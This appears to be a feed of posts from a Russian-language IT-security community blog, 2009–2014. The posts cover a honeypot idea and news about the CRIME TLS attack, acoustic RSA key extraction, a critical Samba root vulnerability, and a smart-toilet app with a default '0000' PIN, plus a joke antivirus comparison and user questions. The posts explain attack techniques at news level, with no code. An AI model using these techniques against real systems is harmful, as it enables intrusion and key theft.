For the oldstable distribution (squeeze), this problem has been fixed in version 0.12.5+dfsg-5+squeeze11.

For the stable distribution (wheezy), this problem has been fixed in version 1.1.2+dfsg-6+deb7u1.

We recommend that you upgrade your qemu-kvm packages.

Отдаю идею в хорошие руки!

Wed, 19 Mar 2014 13:52:00 +0400

Чета посты Друида меня заставили вспонить мою старую идею, которая крутилась в голове когда я был системным инженером и немного системным программистом.

Сразу скажу, возможно уже это реализовано, давно перестал следить за новостями в IT Security. Но если вдруг нет, и кто до раскрутит это дело, я буду только рад. А если еще дадут в подарок акций, то мои потомки будут помнить этого доброго дядю долго)))

Представьте себе идею "обманки", "заманухи")))

Представьте себе хороший комп на хостинге.

Представьте на нем виртуалочку с 256М, а сейчас и можно побольше.

Представьте себе вебсервер с охуенным проектом, у которого уже простой стразу начинается от бакса в секунду))) Какими он портами смотрит в мир? Да правильно 80, и иногда 443! А остальные хост машина переводит на виртуалочку.

Доступ к ssh тоже через виртуалочку, и типо если ты после входа на виртуалку по ssh в течении 1 минуты не ввел фамилию девочки которую ты полюбил первый раз в жизни, поднимается алерт, иначе тебя пропускает на твой вебсервер.

Так же энжинкс, или еще что может быть настроен на переброс запросов которыъ у тебе нет в твоем рабочем вебсервере тода же на виртуалочку.

Что делает виртуалочка! Она смотрит не сканируютли порты. Если с одного адреса, тупо дает команду перекрыть его в iptables. Если с разных выкидывает Алерт.

Она так же смотрит, не путается ли кто-то взломать на твоей машине Джумблу, которой там есно не пахнет. Опять же - если с одного IP болкирует (и скрипт кидис сдет спать), либо поднимает Alert.

Если кто-то лезет на порт почты, и что-то там хочет сделать. Ясный хуй у тебя на вебсервере нет почты))) Но мало ли, IP в блаклист и алерт. Вдруг после этого он (хакирь) примется за то что у тебя реально есть)))

Естественно софт очень умый на виртуалке, всю эту хуйню может анализировать, переодически скачивает БД эксплолитов и т.п.)))

Да и с ДДОСом в подоюной схеме можно что-то придумать)))

ИнтересноЮ врубился кто? или я скомкал всё?)))

В РНК человека обнаружена уязвимость, патчей пока нету

Thu, 06 Mar 2014 23:17:22 +0400

до сих пор ученые не знали, как именно множественные повторы нуклеотидов GGGGCC приводят к поломке гена. Загадочность этого явления связана с тем, что эти повторы появляются только в интронах — некодирующей части ДНК. Последовательности интронов вырезаются из РНК-копии гена во время ее созревания, и, следовательно, никак не влияют на последовательность аминокислот белка.

Оказалось, что множественные повторы в C9orf72 приводят к тому, что ДНК из канонической двуспиральной Уотсон-Криковой формы превращается в четырехспиральную (квадруплекс, «Лента.ру» о такой структуре уже писала). РНК-полимераза, которая пытается сделать копию с такой ДНК, сначала останавливается, а затем «сходит с рельс».

[для мобил] Немного полезного ПО

Sat, 21 Dec 2013 15:27:23 +0400

повышающего вашу безопасность: http://style.rbc.ru/news/hobby/2013/12/13/17416/

Я разгадаю ваш RSA-4096 с семи нот

Thu, 19 Dec 2013 14:21:35 +0400

Ну, не совсем с семи. Однако, методика получения ключа RSA, используя находящийся неподалёку мобильный телефон, всё же заслуживает внимания.

Итак, некто Ади Шамир, тот самый, который стоял у истоков алгоритма RSA, и который значится под буквой S в этой аббревиатуре, предложил на днях очень лёгкий способ получения RSA-ключа с использованием микрофона смартфона и специального ПО. Суть взлома вкраце можно передать так: когда компьютер считает, его конденсаторы с трансформаторами натужно свистят. И вот по этому звуку можно-таки вычислить RSA-ключ.

Слово автору:

Атака проводится следующим образом. В непосредственной близости (около 30 см) от целевой системы размещается сенсор, в качестве которого может выступать обычный смартфон. Для успешной атаки требуется инициирование автоматической расшифровки произвольных сообщений на прослушиваемой системе, например, должен быть запущен почтовый клиент, автоматически расшифровывающий сообщения. Cмартфон периодически отправляет на данную систему немного изменённые сообщения, зашифрованные публично доступным ключом, и контролирует изменение акустических колебаний, исходящих от целевой системы.

На основании изменения характера шума бит за битом реконструируется закрытый ключ (характер входного потока постепенно приводится к звуковой сигнатуре искомого RSA-ключа). На определение 4096-битового RSA-ключа, используемого на ноутбуке, уходит примерно час.

Сообщается, что аналогичные атаки могут быть выполнены через измерение электрического потенциала, который также меняется в зависимости от выполняемых вычислений (достаточные для проведения атаки данные можно снять через удалённые концы кабелей VGA, USB или Ethernet или просто прикоснувшись рукой к корпусу)

Так что гоните-ка в шею всех тех, кто пытается потрогать ваш компьютер.

Литература:

Осеннее обострение паранойи

Thu, 03 Oct 2013 17:01:13 +0400

Бывший директор по приватности Microsoft теперь доверяет только открытому ПО

 Каспар Боуден с 2002 по 2011 года занимал должность главного советника Microsoft по вопросам конфиденциальности — Chief Privacy Advisor — и отвечал за это направление более чем в 40 странах. Вероятно, ему приходилось сотрудничать с АНБ и другими государственными организациями, хотя Боуден говорит, что никогда не слышал о программе PRISM.

 Тем не менее, многолетняя работа в Microsoft привела к тому, что сейчас бывший топ-менеджер корпорации принципиально использует только открытое ПО. Он говорит, что не может доверять программе до тех пор, пока не увидит её исходный код. Вдобавок, два года назад Боуден отказался от использования мобильного телефона.

моар

[СШП][Proxy] Корпорация добра предоставляет бесплатный proxy

Tue, 17 Sep 2013 06:22:41 +0400

Недавно заработался и в translate.google вбил адрес нашей днявочки, и о ужас я таки перешёл Пруф . Потом вставил пару адресов чтобы узнать ip на выхлопе. Угадайте адрес какой страны я получил?
p.s. Оно также и передов осуществляет.

[решето] Очередная критическая уязвимость угрожает человечеству

Mon, 05 Aug 2013 22:52:02 +0400

В приложении для смарт-унитазов Lixil Satis обнаружена критическая уязвимость

Злоумышленники могут подключиться к любому уязвимому унитазу и взять его под свой контроль.
Сотрудники компании Trustwave SpiderLabs обнаружили критическую уязвимость в японских Smart-унитазах модели Lixil Satis. Управление унитазами этого класса осуществляется с помощью специального Android-приложения My Satis, разработанного компанией Lixil.
Сотрудники Trustwave SpiderLabs установили, что в приложении для Android установлен стандартный пинкод «0000», благодаря чему любой пользователь может подключиться к унитазу через Bluetooth. Это удалось установить в результате декомпиляции исходного кода приложения.
Таким образом, злоумышленнику достаточно скачать с Google Play приложение My Satis и он сможет получить доступ к любому унитазу, доступному по Bluetooth.

(c) securitylab.ru

про антивирусы

Mon, 24 Dec 2012 17:19:06 +0400

Касперский

Пехотный батальон. Лагерь вокруг компа, роет окопы и ставит мины, минирует все, обматывает колючей проволокой, обозначает сектора обстрела орудий и пулеметов. Оборону можно прорвать лишь при пятикратном численном превосходстве и только после многочасовых бомбардировок.

Преимущества: Враг сможет пройти лишь превратив компьютер в пустыню. Недостатки: Солдаты хотять кушать, а минные поля и окопы тормозят перемещение гражданских, так что ресурсов системы не остается.

AVG

Батальон вооружен до зубов, но пользоваться оружием не умеет совершенно, периодически стреляя по своим, отчего очень часто страдают гражданские. При появлении противника начинает разворачиваться в боевой порядок и пытается вырыть окопы прямо под пулями, и совершенно не позаботился о заблаговременной организации обороны. В итоге ничего сделать не может, плюет на все и лупит по наползающим танкам из пистолота — разумеется, без толку.

Преимущества: Фольксштурмовцы обходятся подножным кормом, так что ресурсы системы практически не страдают.

Недостатки: Беспорядочная пальба по своим и по гражданским, высокая вероятность сдать позиции за считанные минуты при появлении реального противника.

Avast

Артиллерийская батарея. Эффективна против лобовой атаки — врага, наступающего на нее, способна перемолоть практически в любых количествах, почти без потерь для себя. Однако для ударов c фланга и против заброшенных в тыл диверсантов, делается весьма уязвимой. Разумеется, после того, как орудия будут развернуты в нужном направлении, перелавлюются и диверсанты, но на все требуется время. Преимущества: Артиллеристы голодуют. Поэтому системные ресурсы остаются почти незатронутыми.

Недостатки: Низкая оперативность.

Panda

Женский батальон, составленный из институток, вооруженных старенькими и дряхлими пистолетами. При малейшем шорохе начинают истошно визжать и палить наугад (обычно — в небо). При виде противника стараются работать по принципу "ноги в руки", или падают в обморок.

Преимущества: Практически не заметен.

Недостатки: Полезного эффекта тоже нету.

NOD32

Кавалерийский эскадрон. Оборону держать не научили, при виде врага тут же бросается на него в атаку (но без толку). Пытается взять нахрапом, обычно — психической атакой. Если это не удается с первого раза, идет в партизаны и ждет подходящего момента чтобы повторить процедуру.

Преимущества: Лучшая оборона — это нападение, так что подобная тактика срабатывает всегда, пусть и не с первого раза.

Недостатки: Иногда приходится ждать очень долго. У местных красоток уже рождаются первые детки, похожие на солдат неприятеля, а эскадрон все еще партизанит по лесам и пускает под откос вражеские поезда с женскими подвязками.

McAfee

Танковая бригада. Рычат моторы, чумазые танкисты хватают пробегающих мимо девушек за интересные места, а за лесом идет пальба. Выглядит внушительно и весомо, в бою работает быстро, и эффективно. Враг внутрь проникнуть не может.

Преимущества: Надежность.

Недостатки: Танковая смазка нынче очень дорога, не говоря уже о снарядах и горючем.Иногда забывают за врагов, если вокруг сильно много девушек.

Norton

Оккупационная армия. Офицеры бесплатно пьют шнапс в роскошных ресторанах и кафешках, солдаты бегают по дворам, реквизируют съестное, занимаются мелким мародерством. Другой-то враг в страну, конечно, уже не пролезет, это да. Но и жизнь в условиях оккупации, знаете ли, тоже не сахар.

Преимущества: Граница на замке. Намертво.

Недостатки: Враг уже внутри.

Dr. Web

Батальон карателей. Окружает компьютер оцеплением, ставит военное положение, круглосуточное патрулирование, комендантский час а за провинность - расстрел на месте. Каратели хватаются за оружие по любому поводу, и даже если его нет, просто жестоко избивают прикладами всех, кто покажется им подозрительным, даже если это сам хозяин. Если ходить с поднятыми руками, медленным шагом и повесить на грудь пропуск, есть шанс, что бить будут не сильно и не очень долго.

Преимущества: Враг не пройдет.

Недостатки: Гости и хозяева тоже.

Trend Micro OfficeScan

Батальон наемников-профессионалов. Работают быстро, четко и эффектно, но только за деньги. Не слушают никого, кроме своего центрального офиса. Готовы сжечь даже детский сад и ясли вместе со всеми обитателями, если из центрального офиса сообщат, что это — вражеский пункт.

Преимущества: Nothing personal, just business.

Недостатки: Денег нет? Контракт закрыт, все вопросы к менеджеру.

ClamAV на UNIX-сервере:

Сборка инопланетян, осуществляющая входной контроль. Иммунны к земным болезням, неуязвимы к земному оружию. Не очень хорошо разбираются в лицах землян, в сомнительных случаях пропускают их.

Преимущества: ресурсы системы не тратятся, вернее, тратятся на сервере.

Недостатки: иногда пропускают врагов.

AVZ

Профессионал-одиночка, настоящий приватный агент с революционным чутьём. Десантируется с флешки, уничтожает наступающие войска напалмом, вычисляет шпионов шестым чуством, на ходу проводит фейс-контроль всех солдатов командиров союзников. Быстренько чинит повреждения, нанесённые вредителями, даёт советы по повышению революционной бдительности — и без следа уходит.

Преимущества: Готов вступить в бой без всяких подготовок. Обвешан кучей оружия(картинка РЕМБО), которое может пригодиться и для мирных целей. Работает исключительно за идею и очень, очень быстро.

Недостатки: Одиночка, что он сделает?.

Представлена техника перехвата данных для сжатых соединений TLS и SPDY

Tue, 18 Sep 2012 09:37:27 +0400

пруф c опеннет

text



Джулиано Риццо (Juliano Rizzo) и Тхай Дыонг (Thai Duong), известные исследователи компьютерной безопасности, предложившие в своё время технику атаки BEAST против SSL/TLS, разработали новый способ перехвата на промежуточном шлюзе содержимого сессионных Cookie, передаваемых внутри зашифрованного соединения. Новая атака, получившая название CRIME (Compression Ratio Info-leak Made Easy), эффективна для каналов связи на основе SSL/TLS и SPDY, действует только при использовании сжатия передаваемых данных и требует выполнения JavaScript-кода злоумышленника в браузере клиента (в случае man-in-middle атак осуществить подстановку такого кода не составляет труда).



По своей сути CRIME является продолжением развития идей, воплощённых в методе атаки BEAST. Атака строится на возможности выделения в отслеживаемом зашифрованном трафике блоков данных с метками, отправляемыми подставным JavaScript-кодом на сайт, для которого требуется перехватить Cookie, в рамках общего шифрованного канала связи. Используя тот факт, что данные сжимаются на этапе до шифрования и не подвергаются дополнительной рандомизации, новая атака позволяет обойти средства защиты, добавленные производителями браузеров для блокирования атаки BEAST.



В качестве демонстрации, на транзитном хосте, через который был перенаправлен трафик клиента, был организован перехват сессий для защищённых каналов связи с сервисами Gmail, GitHub, Twitter, Dropbox и Yahoo Mail. По заявлению авторов CRIME, они заранее связались с производителями браузеров и в последние версии Chrome и Firefox (только данные браузеры поддерживают протокол SPDY) уже включены надлежащие патчи, позволяющие защититься от новой техники атаки. Что касается браузеров поддерживающих сжатие SSL/TLS, то в последних выпусках Chrome, Firefox, Opera и Safari сжатие трафика для SSL/TLS было по умолчанию отключено (Internet Explorer подобное сжатие не поддерживается вообще).



На стороне сервера защититься от атаки можно отключив сжатие SSL/TLS, например, для Apache 2.4 можно указать в настройках "SSLCompression off". Концептуальный прототип приложения для осуществления атаки можно найти здесь. Общее число серверов, поддерживающих сжатие SSL/TLS, в настоящее время оценивается в 42%, а число поддерживающих сжатие SSL/TLS браузеров в 7% (с учётом того, что в последних версиях сжатие SSL/TLS отключено).

По хорошему место этому в Толксах, но ...

Thu, 19 Apr 2012 21:03:29 +0400

С хабра
На прошлой неделе ФБР обвинило Higinio O. Ochoa III во взломе государственных сайтов и выкладывании в сеть телефонов и домашних адресов сотрудников полиции. Ochoa также известный как w0rmer, член хакерской группы CabinCr3w ответственный за эти взломы, в феврале добавил твит в @Anonw0rmer с ссылкой на сайт где он выложил эти и другие хакнутые данные. Внизу страницы красовалась грудастая девушка с надписью "PwNd by w0rmer & CabinCr3w <3 u BiTch's !". Фотография была сделана при помощи Iphone с не выключенным GPS, данные из Exif не были удалены, так что ФБР без особых проблем выяснило где же живет эта милая девушка (где то в Австралии). И конечно же она не забыла указать в своем профиле в Facebook кто же ее бойфренд — Higinio Ochoa, 30 летний Linux администратор из Техаса. 20 марта Higinio был арестован по подозрению в хакерских атаках на государственные сайты.

wireless interface connection daemon(WICD) найден баг с повышением привилегий до рута

Thu, 12 Apr 2012 06:00:36 +0400

Изнчально обнаружено в backtrack 5 R2 http://www.infosecinstitute.com/courses/ethical_hacking_training.html

На странице проекта в трекере ошибок, баг пофикшен, выложена новая версия 1.7.2 https://bugs.launchpad.net/wicd/+bug/979221

Думаю, юзающим, имеет смысл обновиться.

В Samba устранена одна из самых опасных уязвимостей за всю историю проекта

Wed, 11 Apr 2012 06:10:13 +0400

http://www.opennet.ru/opennews/art.shtml?num=33574

Представлена внеплановая порция обновлений Samba - 3.6.4, 3.5.14 и 3.4.16, в которых устранена критическая уязвимость (CVE-2012-1182), позволяющая удалённому злоумышленнику выполнить свой код с правами пользователя root. Для успешной эксплуатации уязвимости не требуется прохождение стадии аутентификации, атака может быть осуществлена анонимным не аутентифицированным злоумышленником при наличии доступа к сетевому порту Samba. В силу простоты эксплуатации, широты охвата уязвимых версий и возможности проведения атаки без аутентификации, выявленная проблема является одной из наиболее серьёзных уязвимостей за всю историю проекта.

Проблеме подвержены все версии Samba с 3.0.x по 3.6.3 включительно. Всем пользователям Samba рекомендуется в экстренном порядке провести обновление до представленных корректирующих выпусков. Для уже не поддерживаемых веток Samba подготовлены патчи. Пакеты с устранением уязвимости пока недоступны, проследить выход обновлений для популярных дистрибутивов можно на данных страницах: FreeBSD, Ubuntu, Gentoo, Slackware, Mandriva, openSUSE, CentOS, Scientific Linux, Fedora, RHEL и Debian. Кроме патча обходного пути решения проблемы не найдено, можно только закрыть доступ к порту Samba. В качестве крайней меры можно ограничить доступ к порту для доверительных хостов при помощи опции "hosts allow" в smb.conf, но это не поможет от атаки с поддельного IP-адреса.

Уязвимость была выявлена участниками программы Zero Day Initiative, т.е. не исключено наличие 0-day эксплоита в диком виде. Примечательно, что на исправление ошибки потребовался почти месяц, о проблеме изначально было сообщено ещё 15 марта. Проблема вызвана ошибкой в генераторе кода для механизма RPC (Remote Procedure Call), которая приводит к формированию небезопасного кода, участвующего в осуществлении передаваемых по сети RPC-вызовов. В результате ошибки проверка переменной через которую передаётся размер массива и проверка переменной с запрошенной под этот массив памятью производятся независимо друг от друга. Значение обеих переменных устанавливаются на стороне клиента и полностью контролируются им. Таким образом создаётся возможность передачи массива заведомо большего размера, чем может вместить выделенный под него буфер, что приведёт к наложению "хвоста" массива на другие структуры данных.

Дополнение 1: Вышло обновление для FreeBSD, RHEL и CentOS.

Дополнение 2: Представлено обновление Samba 4.0 alpha 19 с устранением данной уязвимости.

Как такое может быть?

Sun, 04 Dec 2011 09:59:07 +0400

mag@mag-comp:~$ ping www.golos.org
PING golosorg.heroku.com (127.0.0.1) 56(84) bytes of data.
64 bytes from localhost.localdomain (127.0.0.1): icmp_req=1 ttl=64 time=0.031 ms
64 bytes from localhost.localdomain (127.0.0.1): icmp_req=2 ttl=64 time=0.029 ms
64 bytes from localhost.localdomain (127.0.0.1): icmp_req=3 ttl=64 time=0.030 ms

[Clamav]А как заполнить форму для на clamav.net для отправки образца вируса для базы сигнатур?

Fri, 06 May 2011 20:25:00 +0400

Есть один троян и он не обнаруживается clamav. Есть форма на http://cgi.clamav.net/sendvirus.cgi

Так вот, а что отправлять в поле "Attach raw message containing virus*"? Троян? Или троян вместе с autorun.inf? Или что-то другое?

Помогите заполнить форму.

https filtering

Mon, 16 Aug 2010 10:36:00 +0400

Использую Privoxy, проблема в том, что не фильтруется https. Возможно ли это? Как вариант использовать FF+Modify Headers+Adblock Plus.

website security audit

Wed, 21 Oct 2009 11:41:00 +0400

Чем проверить на вшивость вебсервис наваянный на яве?

Тема безопасности в вебе в плане CSRF, XSS, SQL-инъекций, etc.

Wed, 09 Sep 2009 18:12:00 +0400

Подскажите какой сайт или книгу, чтобы не наступать на туксоедовы грабли.

[TOR] Обязательно ли отключать JavaScript?

Sat, 29 Aug 2009 19:08:00 +0400

При использовании TOR если браузеру указан адрес прокси (порт TOR) может ли скрипт на JavaScript послать запрос в обход настройки браузера? Т.е. "выдать" реальный IP?